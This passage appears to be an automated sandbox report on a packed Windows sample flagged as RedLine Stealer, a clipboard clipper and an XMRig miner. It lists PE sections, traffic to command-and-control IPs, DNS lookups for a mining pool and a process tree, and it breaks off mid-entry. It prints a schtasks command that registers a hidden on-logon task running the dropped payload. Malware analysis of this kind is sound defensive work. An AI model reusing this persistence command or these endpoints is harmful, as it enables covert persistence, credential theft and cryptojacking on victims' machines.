                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x100000

                                                                                                                                  Sections

                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                  0x10000x220000x11200False1.00044194799data7.99714150919IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x230000x10000x800False1.00537109375data7.89828462596IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x240000xf0000x7a00False1.00051229508data7.99330469272IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x330000x20000x400False1.0107421875data7.78378163159IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x350000x184b570x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  0x1ba0000x3210000x2f2e00unknownunknownunknownunknownIMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .rsrc0x4db0000x1a0000x19800False0.797200520833data7.22431447957IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .loHdXUK0x4f50000x4b0000x4b000False0.987828776042data7.91937517669IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                  .adata0x5400000x10000x0False0empty0.0IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

                                                                                                                                  Resources

                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                  RT_RCDATA0x4db0a00x19400dataRussianRussia
                                                                                                                                  RT_MANIFEST0x4f44a00x17dXML 1.0 document textEnglishUnited States

                                                                                                                                  Imports

                                                                                                                                  DLLImport
                                                                                                                                  kernel32.dllGetProcAddress, GetModuleHandleA, LoadLibraryA
                                                                                                                                  user32.dllSendNotifyMessageA
                                                                                                                                  user32.dllGetProcessWindowStation
                                                                                                                                  oleaut32.dllVariantChangeTypeEx
                                                                                                                                  kernel32.dllRaiseException

                                                                                                                                  Possible Origin

                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                  RussianRussia
                                                                                                                                  EnglishUnited States

                                                                                                                                  Network Behavior

                                                                                                                                  Network Port Distribution

                                                                                                                                  TCP Packets

                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                  Jan 14, 2022 14:10:23.709512949 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:23.796896935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:23.797002077 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:24.136492968 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:24.224102020 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:24.264045954 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:25.159163952 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:25.247483015 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:25.295356035 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:32.091963053 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:32.186028957 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:32.186074972 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:32.186101913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:32.186130047 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:32.233455896 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.538239956 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.641689062 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:35.654805899 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.745630026 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:35.764975071 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:35.842448950 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:35.890078068 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.255490065 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.343178988 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.390085936 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.397934914 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.482103109 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.483335018 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.494489908 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.577361107 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.624452114 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.687441111 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:36.771337986 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.771641970 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:36.812041044 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:37.849256039 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:37.941068888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:37.984029055 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.003041029 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.098922968 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.100498915 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.195523977 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.213527918 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.310400963 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.314667940 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.412040949 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.417639017 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.506715059 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.508869886 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.588546991 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.640252113 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.685822010 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:38.763355970 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:38.812166929 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.769198895 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848496914 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848567963 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848609924 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848651886 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848706961 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.848743916 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848903894 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.848989010 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.849109888 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849236012 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849315882 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.849493027 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849663973 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.849746943 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927041054 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927073002 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927088022 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927182913 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927268028 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927330017 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927339077 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927433968 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.927505016 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927697897 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927826881 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.927833080 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928020000 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928098917 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928174973 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928427935 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928509951 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.928670883 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928754091 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.928910017 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929117918 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929435015 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929454088 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929722071 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:39.929796934 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:39.929867983 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008032084 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008120060 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008166075 CET4977531334192.168.2.495.143.179.185
                                                                                                                                  Jan 14, 2022 14:10:40.008246899 CET313344977595.143.179.185192.168.2.4
                                                                                                                                  Jan 14, 2022 14:10:40.008256912 CET4977531334192.168.2.495.143.179.185

                                                                                                                                  DNS Queries

                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                  Jan 14, 2022 14:11:24.046226978 CET192.168.2.48.8.8.80x6868Standard query (0)mine.bmpool.orgA (IP address)IN (0x0001)
                                                                                                                                  Jan 14, 2022 14:11:35.964977026 CET192.168.2.48.8.8.80x728aStandard query (0)mine.bmpool.orgA (IP address)IN (0x0001)

                                                                                                                                  DNS Answers

                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                  Jan 14, 2022 14:11:24.071038961 CET8.8.8.8192.168.2.40x6868No error (0)mine.bmpool.org157.90.156.89A (IP address)IN (0x0001)
                                                                                                                                  Jan 14, 2022 14:11:35.987705946 CET8.8.8.8192.168.2.40x728aNo error (0)mine.bmpool.org157.90.156.89A (IP address)IN (0x0001)

                                                                                                                                  HTTP Request Dependency Graph

                                                                                                                                  • 45.82.70.152:7777

                                                                                                                                  Code Manipulations

                                                                                                                                  Statistics

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  Analysis Process: 982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe PID: 6220 Parent PID: 5336

                                                                                                                                  General

                                                                                                                                  Start time:14:10:10
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\Desktop\982d4ea5fee5b8e551d40cb07272e1bcf707edff1001d.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:3609088 bytes
                                                                                                                                  MD5 hash:C7F9EFB09DB59923B3F96FD1EF2F0873
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.656396342.00000000000C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.655906687.00000000036F2000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:low

                                                                                                                                  Analysis Process: AppLaunch.exe PID: 5180 Parent PID: 6220

                                                                                                                                  General

                                                                                                                                  Start time:14:10:12
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Imagebase:0x1040000
                                                                                                                                  File size:98912 bytes
                                                                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.734795118.0000000007020000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.731135586.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  Analysis Process: sistem.exe PID: 5576 Parent PID: 5180

                                                                                                                                  General

                                                                                                                                  Start time:14:10:42
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\sistem.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\sistem.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:3514792 bytes
                                                                                                                                  MD5 hash:14A6FC2FF495BE7077B8AA7602606BB7
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:Borland Delphi
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000008.00000002.725269917.00000000000BD000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000008.00000003.724529883.0000000002912000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                  • Detection: 31%, Metadefender, Browse
                                                                                                                                  • Detection: 75%, ReversingLabs
                                                                                                                                  Reputation:low

                                                                                                                                  Analysis Process: AppLaunch.exe PID: 7016 Parent PID: 5576

                                                                                                                                  General

                                                                                                                                  Start time:14:10:44
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                                                  Imagebase:0x1040000
                                                                                                                                  File size:98912 bytes
                                                                                                                                  MD5 hash:6807F903AC06FF7E1670181378690B22
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_RedlineClipper, Description: Yara detected Redline Clipper, Source: 00000009.00000002.917454053.0000000000402000.00000020.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:moderate

                                                                                                                                  Analysis Process: Microsoft.exe PID: 7116 Parent PID: 5180

                                                                                                                                  General

                                                                                                                                  Start time:14:10:44
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Users\user\AppData\Local\Temp\Microsoft.exe"
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 53%, Virustotal, Browse
                                                                                                                                  Reputation:low

                                                                                                                                  Analysis Process: conhost.exe PID: 2188 Parent PID: 7116

                                                                                                                                  General

                                                                                                                                  Start time:14:10:47
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\Microsoft.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: cmd.exe PID: 6036 Parent PID: 2188

                                                                                                                                  General

                                                                                                                                  Start time:14:10:50
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: conhost.exe PID: 1584 Parent PID: 6036

                                                                                                                                  General

                                                                                                                                  Start time:14:10:51
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: schtasks.exe PID: 6380 Parent PID: 6036

                                                                                                                                  General

                                                                                                                                  Start time:14:10:51
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Users\user\AppData\Local\Temp\services64.exe"
                                                                                                                                  Imagebase:0x7ff6d4de0000
                                                                                                                                  File size:226816 bytes
                                                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: services64.exe PID: 6688 Parent PID: 968

                                                                                                                                  General

                                                                                                                                  Start time:14:10:53
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Antivirus matches:
                                                                                                                                  • Detection: 100%, Avira
                                                                                                                                  • Detection: 53%, Virustotal, Browse
                                                                                                                                  Reputation:low

                                                                                                                                  Analysis Process: cmd.exe PID: 6696 Parent PID: 2188

                                                                                                                                  General

                                                                                                                                  Start time:14:10:53
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:cmd" cmd /c "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff622070000
                                                                                                                                  File size:273920 bytes
                                                                                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: conhost.exe PID: 6012 Parent PID: 6688

                                                                                                                                  General

                                                                                                                                  Start time:14:10:54
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.821033223.0000020180001000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.768854155.00000201F4E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.833907322.000002019125C000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.822124457.0000020190009000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000003.802096834.00000201F4E40000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000011.00000002.829515499.0000020190C84000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: conhost.exe PID: 3160 Parent PID: 6696

                                                                                                                                  General

                                                                                                                                  Start time:14:10:54
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high

                                                                                                                                  Analysis Process: services64.exe PID: 864 Parent PID: 6696

                                                                                                                                  General

                                                                                                                                  Start time:14:10:55
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:2233856 bytes
                                                                                                                                  MD5 hash:AFA47609E27DB892A6E3597A88C5645A
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:low

                                                                                                                                  Analysis Process: conhost.exe PID: 6840 Parent PID: 864

                                                                                                                                  General

                                                                                                                                  Start time:14:10:56
                                                                                                                                  Start date:14/01/2022
                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:C:\Windows\System32\conhost.exe" "C:\Users\user\AppData\Local\Temp\services64.exe
                                                                                                                                  Imagebase:0x7ff724c50000
                                                                                                                                  File size:625664 bytes
                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                  Yara matches:
